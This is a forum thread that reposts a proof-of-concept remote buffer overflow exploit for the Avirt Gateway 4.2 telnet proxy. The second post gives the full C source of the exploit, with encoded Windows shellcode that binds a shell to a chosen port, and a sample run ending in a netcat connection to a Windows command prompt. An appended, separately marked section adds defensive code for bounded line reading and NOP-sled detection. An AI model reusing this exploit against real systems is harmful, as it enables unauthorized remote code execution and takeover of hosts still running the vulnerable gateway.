
Thread: Avirt Gateway v4.2-proof of concept

  1. #1

    Avirt Gateway v4.2 - proof of concept

    The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a string of about 510 bytes at the "Ready>" prompt will overwrite EIP.
    The exploit will bind a shell to a specified port on the attacked host.

    Read proof of concept at www.xatrix.org

  2. #2
    s0nIc (Join Date: Sep 2001, Location: Sydney, Posts: 1,584)

    And for those who couldn't bother clicking the link...


    Avirt Gateway 4.2 remote buffer overflow: proof of concept

    The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a string of about 510 bytes at the "Ready>" prompt will overwrite EIP.
    The exploit will bind a shell to a specified port on the attacked host.



    Example:
    bash-2.05$ agate 10.0.0.1 7007


    Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)


    initialising socket
    ...initialized
    trying to connect
    ...connected
    (waiting)
    sending exploit
    ...sent
    (waiting)
    ...closed
    shell bound to port 7007
    bash-2.05$ nc -v target 7007
    target [10.0.0.1] 7007 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.


    C:\>



    Exploit:
    ----------------------------------------------------------------------------cut----------------------------------------------------------------------------
    /* agate.c by uid0x00
     * Avirt Gateway 4.2 remote exploit
     * compile with gcc agate.c -o agate
     *
     * tested with win2k, sp2
     *
     * thx to ByteRage, exploit is based on his shellcode
     */

    /* Set the following three defines according to the DLL we use */

    // MSVCRT.DLL version 6.10.8924.0 (win2K)
    #define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
    #define GetProcAddressRefADD "\xFC"
    #define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

    /* headers for printf/atoi, memset/memcpy, sleep/close, errno and the BSD socket API */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int main(int argc, char *argv[]) {
        int s;
        struct sockaddr_in SockAdr;
        char exploit[1024];
        unsigned short int a_port;

        char shellcode[] =

        /* ==== SHELLC0DE START ==== */
        /* shellcode based on ByteRage's 450byte code (thx for your help man!) */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\xEB\x06\x90\x90" newEIP "\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
        "\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB" LoadLibraryRefNEG
        "\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53" GetProcAddressRefADD "\xAB\xAC"
        "\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
        "\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
        "\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
        "\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
        "\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
        "\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
        "\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
        "\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
        "\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
        "\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
        "\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
        "\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
        "\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
        "\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
        "\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
        "\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
        "\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
        "\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";
        /* ==== SHELLC0DE ENDS ==== */

        printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");

        if (argc < 3) {
            printf("usage: %s <host> <port>\n", argv[0]);
            return 0;
        }

        //insert shell port
        a_port = htons(atoi(argv[2]));
        a_port ^= 0x9999;
        shellcode[964] = (a_port) & 0xff;
        shellcode[965] = (a_port >> 8) & 0xff;

        //init the exploit buffer
        memset(exploit, '\xCC', 0x200);
        memcpy(exploit, shellcode, sizeof(shellcode) - 1);

        printf("initialising socket\n");
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
        if (s >= 0) {   /* socket() returns -1 on failure, so test for a valid descriptor */
            printf("...initialized\n");

            memset(&SockAdr, 0, sizeof(SockAdr));
            SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
            SockAdr.sin_family = AF_INET;
            SockAdr.sin_port = htons(23);

            printf("trying to connect\n");
            if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
                printf("...connected\n");
                printf("(waiting)\n");
                sleep(3);

                printf("sending exploit\n");
                send(s, exploit, sizeof(exploit), 0);
                printf("...sent\n");

                printf("(waiting)\n");
                sleep(3);

                printf("...closed\nshell bound to port %s\n", argv[2]);
                close(s);
            }
            else {
                printf("... failed errno = %i\n", errno);
                close(s);
                return 0;
            }
        }
        return 0;
    }
    ----------------------------------------------------------------------------cut----------------------------------------------------------------------------
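    The defensive counterpart to the advisory above, added here as an example and not taken from this thread, from Avirt, or from uid0x00's exploit: a prompt handler that reads a line from the connection into a fixed buffer with an explicit bound, so a line longer than the buffer is discarded rather than copied over the saved return address, together with a small heuristic a proxy or IDS could apply to the same bytes (an oversized line, or a long run of 0x90 NOP bytes like the padding in the payload). The limits MAX_LINE and SLED_THRESHOLD, the function names and the sample stream are this example's own assumptions.

```c
/* Added example (not code from this thread, from Avirt, or from uid0x00):
 * bounded line reading for a text prompt such as "Ready>", plus a heuristic
 * that flags input resembling the payload above (oversized line, NOP sled).
 * MAX_LINE, SLED_THRESHOLD and all names below are assumptions of this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_LINE       256  /* assumed prompt limit, well under the ~510 bytes the advisory names */
#define SLED_THRESHOLD 32   /* assumed: this many consecutive 0x90 bytes counts as a NOP sled */
#define SAMPLE_CAP     1024

enum line_status { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_NOP_SLED = 2, LINE_INCOMPLETE = 3 };

/* Longest run of consecutive 0x90 bytes in buf[0..len). */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Read one '\n'-terminated line from stream[0..stream_len) (standing in for
 * bytes received on the socket). At most cap-1 bytes are copied into out,
 * which is always NUL-terminated. *consumed receives the stream bytes used,
 * including the full length of an oversized line, so the caller can drop it
 * and keep reading instead of copying it into a fixed-size buffer. */
enum line_status read_line_bounded(const unsigned char *stream, size_t stream_len,
                                   char *out, size_t cap, size_t *consumed)
{
    const unsigned char *nl = memchr(stream, '\n', stream_len);
    size_t line_len, body;

    out[0] = '\0';
    if (nl == NULL) {
        /* No terminator yet: wait for more data, unless the client has already
         * sent more than fits, in which case reject without waiting for one. */
        *consumed = stream_len;
        return (stream_len >= cap) ? LINE_TOO_LONG : LINE_INCOMPLETE;
    }
    line_len = (size_t)(nl - stream);
    *consumed = line_len + 1;
    /* Telnet clients send CRLF; drop the '\r'. */
    body = (line_len > 0 && stream[line_len - 1] == '\r') ? line_len - 1 : line_len;
    if (longest_nop_run(stream, body) >= SLED_THRESHOLD) return LINE_NOP_SLED;
    if (body >= cap) return LINE_TOO_LONG;
    memcpy(out, stream, body);
    out[body] = '\0';
    return LINE_OK;
}

/* Feed a whole stream through the reader; counts[status] receives how many
 * lines ended with each status. Returns the number of lines seen. */
size_t process_stream(const unsigned char *stream, size_t len, int counts[4])
{
    char line[MAX_LINE];
    size_t off = 0, lines = 0;

    memset(counts, 0, 4 * sizeof counts[0]);
    while (off < len) {
        size_t used = 0;
        enum line_status st = read_line_bounded(stream + off, len - off, line, sizeof line, &used);
        counts[st]++;
        lines++;
        if (st == LINE_INCOMPLETE) break; /* a real server would wait for more bytes here */
        off += used;
    }
    return lines;
}

/* Constructed sample stream: a normal command, a 540-byte line of 0x90 padding
 * in the style of the payload above, then another normal command. */
size_t build_sample(unsigned char *buf)
{
    size_t n = 0;
    memcpy(buf + n, "help\r\n", 6); n += 6;
    memset(buf + n, 0x90, 540);     n += 540;
    memcpy(buf + n, "\r\n", 2);     n += 2;
    memcpy(buf + n, "quit\r\n", 6); n += 6;
    return n;
}

/* How many lines of the constructed sample ended with the given status. */
int sample_count(enum line_status st)
{
    unsigned char sample[SAMPLE_CAP];
    int counts[4];
    process_stream(sample, build_sample(sample), counts);
    return counts[st];
}

/* Status of a plain line of n 'A' bytes followed by '\n' (n < SAMPLE_CAP). */
enum line_status classify_plain_line(size_t n)
{
    unsigned char buf[SAMPLE_CAP];
    char out[MAX_LINE];
    size_t used;
    memset(buf, 'A', n);
    buf[n] = '\n';
    return read_line_bounded(buf, n + 1, out, sizeof out, &used);
}

int main(void)
{
    unsigned char sample[SAMPLE_CAP];
    int counts[4];
    size_t lines = process_stream(sample, build_sample(sample), counts);
    printf("%zu lines: %d ok, %d too long, %d nop sled, %d incomplete\n", lines,
           counts[LINE_OK], counts[LINE_TOO_LONG], counts[LINE_NOP_SLED], counts[LINE_INCOMPLETE]);
    return 0;
}
```

    The point of returning `*consumed` even for a rejected line is that the handler can skip the whole oversized line and continue with the next one; a reader that stops copying at the buffer limit but leaves the rest of the line in the stream would reparse the remainder as new commands. The NOP-sled check is only a heuristic: a length bound on the prompt line is the actual fix, since the overflow the advisory describes needs roughly 510 bytes regardless of what those bytes contain.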
